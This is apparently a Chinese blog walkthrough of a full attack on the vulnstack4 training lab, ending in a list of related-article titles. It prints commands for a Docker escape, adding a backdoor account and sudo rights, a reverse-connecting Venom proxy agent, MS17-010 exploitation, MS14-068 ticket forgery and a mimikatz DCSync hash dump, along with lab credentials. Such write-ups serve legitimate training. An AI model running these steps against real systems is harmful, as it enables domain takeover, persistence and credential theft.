靶场vulnstack4内网渗透
环境介绍:
服务器:192.168.183.129、192.168.10.232
win7:192.168.183.131
DC:192.168.183.130
kali:192.168.10.182
1.拿webshell
对ubuntu的IP进行端口扫描
访问ubuntu的ip:2002 或2001或2003
用AWVS对IP:2002扫描
对其进行抓包,改包,重放
上传后访问的页面
用蚁剑连接(最好用冰蝎)
2.逃溢docker
连接后打开终端执行ip addr
可以对比我们搭建的环境看到是在docker环境里
要拿到服务器权限就要跳出docker
把sda1挂到docker里
cd /tmp
mkdir test
mount /dev/sda1 test
现在test相当与宿主机的根目录了
执行cat test/etc/passwd
这个时候可以用ssh连接
也可以写入我们自己的账号密码进行连接
cat /etc/passwd
cat /etc/shadow
在蚁剑里用下面命令写入
账号:admin123 密码:QAZWSXqaz
echo 'admin123:x:1001:1001::/home/admin123:/bin/bash'>>test/etc/passwd
echo 'admin123:$1$6jyq9ouK$v4zEUImeLNV0rLMP7i4bG0:19313:0:99999:7:::'>>test/etc/shadow
用kali主机连接
ssh admin123@192.168.10.232
不能直接useradd添加用户
3.提权
因为是普通用户,所以要提权
查看用户权限:
cat test/etc/sudoers
把admin123用户提到跟root用户权限一样
echo 'admin123 ALL=(ALL:ALL) ALL'>>test/etc/sudoers
执行
sudo su root
4.内网渗透
这里用的工具fscan_mda,下载地址:
https://github.com/shadow1ng/fscan/releases/tag/1.8.1https://github.com/shadow1ng/fscan/releases/tag/1.8.1
在fscan目录下先启一个服务:
python2:python -m SimpleHTTPServer 8888
python3:python -m http.server 8888
下载kali主机上的fscan_amd64扫描工具:
wget http://192.168.10.182:8888/fscan_amd64
注:192.168.10.182是kali的ip
添加可执行权限:
chmod +x fscan_amd64
进行整段扫描:
./fscan_amd64 -h 192.168.183.1-255
192.168.183.130是域控,直接拿域控另一台主机就没用了。所以先对192.168.183.131这台主机进行攻击。
Venom下载地址:
Release Venom v1.1.0 · Dliv3/Venom · GitHubVenom - A Multi-hop Proxy for Penetration Testers. Contribute to Dliv3/Venom development by creating an account on GitHub.https://github.com/Dliv3/Venom/releases/tag/v1.1.0
在Venom目录下先启一个服务:
python -m http.server 8888
在Venom目录下开启一个监听端:
./admin_linux_x64 -lport 5555
下载客户端agent_linux_x64:
wget http://192.168.10.182:8888/agent_linux_x64
添加可执行权限:
chmod +x agent_linux_x64
让服务器回联本机:
./agent_linux_x64 -rhost 192.168.10.182 -rport 5555
这里收到代理的节点
goto 到节点:
goto 1
启动socks监听:
socks 7777
这样就在kali上使用了一个socks 7777的监听代理
现在我们就能请求内网了
然后用msf利用永恒之蓝漏洞(ms17_010)打内网主机
msfconsole
search ms17_010
use 0
set payload windows/x64/meterpreter/bind_tcp
设置代理:
set Proxies socks5:127.0.0.1:7777
自己配置好就行
成功
拿域控
shell
chcp 65001
systeminfo
cd c:\users
查看用户:
dir
很明显就是douser了
使用ms14-068:
ms14-068
<userName>:douser
<domainName>:demo.com
systeminfo里的
<domainControlerAddr>:192.168.183.130
net view
nslookup \\TESTWIN7-PC
<clearPassword>:Dotest123
load kiwi
creds_all
<domainControlerAddr>:S-1-5-21-979886063-1111900045-1414766810-1107
查看进程:
ps
找到douser的进程的pid,从进程窃取token:
steal_token 1200
注:不窃取token,直接执行whoami /all获取的是system的sid
获取令牌:
ms14-068 -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130
导入令牌:
rev2self
shell
cd c:\users\douser\desktop
mimikatz
kerberos::ptc TGT_douser@demo.com.ccache
dir \\WIN-ENS2VR5TR3N\c$
拿域控获取hash:
mimikatz
lsadump::dcsync /user:krbtgt /domain:demo.com
靶场vulnstack4内网渗透相关推荐
- 红日靶场vulnstack1 内网渗透学习
目录 前言: 信息收集: phpmyadmin getshell 日志写shell yxcms getshell 植入后们: 内网域环境信息收集: 基于msf 进行信息收集: 基于msf 内网信息收集 ...
- Defcon China 靶场题 - 内网渗透Writeup
对内网渗透的题目挺感兴趣的,所以做了一发. 先给个拓扑图 1. wordpress http://192.168.1.2/是一个wordpress 文件上传: http://192.168.1.2/w ...
- 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)
内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...
- vulnstack内网渗透环境靶场-1 大全
一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack ...
- 三层网络靶场搭建MSF内网渗透
三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...
- 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
靶场下载:漏洞详情 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...
- 网络靶场实战-记一次大型内网渗透实践 【一】
本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景准备 · 场景名称 某大 ...
- 内网渗透靶场 Vulnstack(一)
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,msf与cs都搞了一下,搞了蛮久的,学到了不少,继续努力!!! 首先对内网域进行了解一下. 域是计算机网络的一种形式,其中所有用 ...
- 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...
最新文章
- eclipse 创建maven 项目 动态web工程完整示例
- 2021年春季学期-信号与系统-第十一次作业参考答案-第八小题
- 使用 Go 语言开发大型 MMORPG 游戏服务器怎么样?(非常稳定、捕获所有异常、非常适合从头开始,但大公司已经有现成的C++框架、所以不会使用)
- mina android 服务器,MINA框架----------android客户端与服务器端
- RHEL6 64bit下更改YUM配置。yum this system is not registered with rhn的解决办法
- LiveVideoStack调查问卷
- “数据资产化”线上论坛圆满结束!
- 面进了心心念念的国企!以为TM上岸了!干了1年!我却再次选择回到互联网大厂内卷!...
- POI SXSSFWorkbook 实现大批量数据 导出
- 最早使用计算机领域,第2章 交换单元及交换网络(2.3.4).ppt
- 17-基于51单片机的银行排队叫号系统设计
- 威伦触摸屏和三菱PLC通信
- 【组合数学】组合恒等式总结 ( 十一个组合恒等式 | 组合恒等式证明方法 | 求和方法 ) ★
- 刚装新系统环境mscorsvw.exe进程占用CPU资料50%以上的原因
- 集集自助服务密码重置
- 关于ITIL、ITIL认证、ITIL的价值
- 使用Python一键删除全盘文件自动关机并留后门
- python 如何绘制分叉图
- 手把手教学51单片机第三课 | 复位电路、数码管静态显示
- 【转帖】关于找工作的鸡零狗碎(续)
热门文章
- java中的finalize
- 期末复习----习题
- 黑科技编程开发,利用Python使图片完美去除水印
- 服务器找不到存储服务器,Alfresco社区版“在此服务器上找不到Alfresco存储库”...
- sklearn中predict()与predict_proba()返回值意义
- likely()和unlikely()
- 鸿蒙系统运行内存为啥只有8g,明明8G内存,系统却显示只有4G!为啥会这样?
- java中高效遍历list_Java中四种遍历List的方法总结(推荐)
- C++最长公共子序列问题(LCS)(递归+迭代)
- CSS 清楚浮动总结